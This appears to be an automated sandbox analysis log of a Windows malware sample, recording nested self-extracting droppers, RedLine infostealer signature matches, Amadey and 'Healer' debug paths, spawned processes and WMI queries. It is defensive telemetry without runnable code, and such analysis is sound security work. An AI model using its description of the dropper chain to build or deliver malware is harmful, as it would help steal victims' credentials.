                          Source: 21fvBVFMsn.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: 2.3.sMt14vz.exe.49fac20.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 5.0.kxL91dA.exe.4e0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 2.3.sMt14vz.exe.49fac20.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe, type: DROPPEDMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: C:\Users\user\Desktop\21fvBVFMsn.exeCode function: 0_2_00A41F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,0_2_00A41F90
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exeCode function: 1_2_00321F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,1_2_00321F90
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exeCode function: 2_2_010D1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,2_2_010D1F90
                          Source: C:\Users\user\Desktop\21fvBVFMsn.exeCode function: 0_2_00A43BA20_2_00A43BA2
                          Source: C:\Users\user\Desktop\21fvBVFMsn.exeCode function: 0_2_00A45C9E0_2_00A45C9E
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exeCode function: 1_2_00323BA21_2_00323BA2
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exeCode function: 1_2_00325C9E1_2_00325C9E
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exeCode function: 2_2_010D3BA22_2_010D3BA2
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exeCode function: 2_2_010D5C9E2_2_010D5C9E
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeCode function: 5_2_0279F7C85_2_0279F7C8
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeCode function: 5_2_0279F3685_2_0279F368
                          Source: 21fvBVFMsn.exeStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 608538 bytes, 2 files, at 0x2c +A "sEm51bM.exe" +A "nIp99Jf.exe", ID 1891, number 1, 25 datablocks, 0x1503 compression
                          Source: sEm51bM.exe.0.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 415252 bytes, 2 files, at 0x2c +A "sMt14vz.exe" +A "lbt58JR.exe", ID 1972, number 1, 18 datablocks, 0x1503 compression
                          Source: sMt14vz.exe.1.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 50172 bytes, 2 files, at 0x2c +A "ijx54ck.exe" +A "kxL91dA.exe", ID 1952, number 1, 6 datablocks, 0x1503 compression
                          Source: 21fvBVFMsn.exe, 00000000.00000003.241227286.0000000004A02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs 21fvBVFMsn.exe
                          Source: 21fvBVFMsn.exeBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs 21fvBVFMsn.exe
                          Source: C:\Users\user\Desktop\21fvBVFMsn.exeSection loaded: sfc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exeSection loaded: sfc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exeSection loaded: sfc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exeSection loaded: sfc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeSection loaded: sfc.dllJump to behavior
                          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nIp99Jf.exe 0A763637206A70A3EC6707FE5728EA673AE3BC11EB5E059D962E99DCC3991F31
                          Source: 21fvBVFMsn.exeReversingLabs: Detection: 76%
                          Source: 21fvBVFMsn.exeVirustotal: Detection: 55%
                          Source: 21fvBVFMsn.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: C:\Users\user\Desktop\21fvBVFMsn.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\21fvBVFMsn.exe C:\Users\user\Desktop\21fvBVFMsn.exe
                          Source: C:\Users\user\Desktop\21fvBVFMsn.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exe
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exe
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exe
                          Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe
                          Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                          Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                          Source: C:\Users\user\Desktop\21fvBVFMsn.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                          Source: C:\Users\user\Desktop\21fvBVFMsn.exeCode function: 0_2_00A41F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,0_2_00A41F90
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exeCode function: 1_2_00321F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,1_2_00321F90
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exeCode function: 2_2_010D1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,2_2_010D1F90
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ijx54ck.exe.logJump to behavior
                          Source: C:\Users\user\Desktop\21fvBVFMsn.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMPJump to behavior
                          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@12/8@0/1
                          Source: C:\Users\user\Desktop\21fvBVFMsn.exeCode function: 0_2_00A4597D GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_00A4597D
                          Source: C:\Users\user\Desktop\21fvBVFMsn.exeCode function: 0_2_00A43FEF CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,GetLastError,FormatMessageA,0_2_00A43FEF
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exeCode function: 3_2_00007FFBACE61B61 ChangeServiceConfigA,3_2_00007FFBACE61B61
                          Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                          Source: C:\Users\user\Desktop\21fvBVFMsn.exeCode function: 0_2_00A44FE0 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,FreeResource,SendMessageA,0_2_00A44FE0
                          Source: C:\Users\user\Desktop\21fvBVFMsn.exeCommand line argument: Kernel32.dll0_2_00A42BFB
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exeCommand line argument: Kernel32.dll1_2_00322BFB
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exeCommand line argument: Kernel32.dll2_2_010D2BFB
                          Source: C:\Users\user\Desktop\21fvBVFMsn.exeAutomated click: OK
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exeAutomated click: OK
                          Source: 21fvBVFMsn.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                          Source: 21fvBVFMsn.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                          Source: 21fvBVFMsn.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                          Source: 21fvBVFMsn.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: 21fvBVFMsn.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                          Source: 21fvBVFMsn.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                          Source: 21fvBVFMsn.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                          Source: 21fvBVFMsn.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: Binary string: 0C:\nusegilo zawufeha_koboxuyokefamo\doneni.pdb source: sEm51bM.exe, 00000001.00000003.242054317.0000000004724000.00000004.00000020.00020000.00000000.sdmp, lbt58JR.exe.1.dr
                          Source: Binary string: wextract.pdb source: 21fvBVFMsn.exe, sEm51bM.exe.0.dr, sMt14vz.exe.1.dr
                          Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: 21fvBVFMsn.exe, 00000000.00000003.241383449.0000000002ED4000.00000004.00000020.00020000.00000000.sdmp, 21fvBVFMsn.exe, 00000000.00000003.241227286.0000000004A02000.00000004.00000020.00020000.00000000.sdmp, nIp99Jf.exe.0.dr
                          Source: Binary string: wextract.pdbGCTL source: 21fvBVFMsn.exe, sEm51bM.exe.0.dr, sMt14vz.exe.1.dr
                          Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: sMt14vz.exe, 00000002.00000003.242565782.00000000049F8000.00000004.00000020.00020000.00000000.sdmp, ijx54ck.exe, 00000003.00000000.242765935.00000000006E2000.00000002.00000001.01000000.00000006.sdmp, ijx54ck.exe.2.dr
                          Source: Binary string: C:\nusegilo zawufeha_koboxuyokefamo\doneni.pdb source: sEm51bM.exe, 00000001.00000003.242054317.0000000004724000.00000004.00000020.00020000.00000000.sdmp, lbt58JR.exe.1.dr
                          Source: C:\Users\user\Desktop\21fvBVFMsn.exeCode function: 0_2_00A4724D push ecx; ret 0_2_00A47260
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exeCode function: 1_2_0032724D push ecx; ret 1_2_00327260
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exeCode function: 2_2_010D724D push ecx; ret 2_2_010D7260
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exeCode function: 3_2_00007FFBACE60C91 push eax; ret 3_2_00007FFBACE60DDF
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exeCode function: 3_2_00007FFBACE607CA push eax; ret 3_2_00007FFBACE60A0B
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exeCode function: 3_2_00007FFBACE61B61 push eax; ret 3_2_00007FFBACE62026
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exeCode function: 3_2_00007FFBACE61A1D push eax; ret 3_2_00007FFBACE61B5E
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exeCode function: 3_2_00007FFBACE60E52 push eax; ret 3_2_00007FFBACE60ECE
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exeCode function: 3_2_00007FFBACE60ED1 push eax; ret 3_2_00007FFBACE61009
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exeCode function: 3_2_00007FFBACE6077D push eax; ret 3_2_00007FFBACE607C7
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exeCode function: 3_2_00007FFBACE60C34 push eax; ret 3_2_00007FFBACE60C8E
                          Source: C:\Users\user\Desktop\21fvBVFMsn.exeCode function: 0_2_00A4202A memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,GetModuleFileNameA,LocalAlloc,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,0_2_00A4202A
                          Source: ijx54ck.exe.2.drStatic PE information: 0xE382D401 [Fri Dec 15 06:19:45 2090 UTC]
                          Source: C:\Users\user\Desktop\21fvBVFMsn.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nIp99Jf.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exeFile created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\lbt58JR.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exeFile created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeJump to dropped file
                          Source: C:\Users\user\Desktop\21fvBVFMsn.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exeFile created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exeFile created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exeJump to dropped file
                          Source: C:\Users\user\Desktop\21fvBVFMsn.exeCode function: 0_2_00A41AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,0_2_00A41AE8
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exeCode function: 1_2_00321AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,1_2_00321AE8
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exeCode function: 2_2_010D1AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,2_2_010D1AE8
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
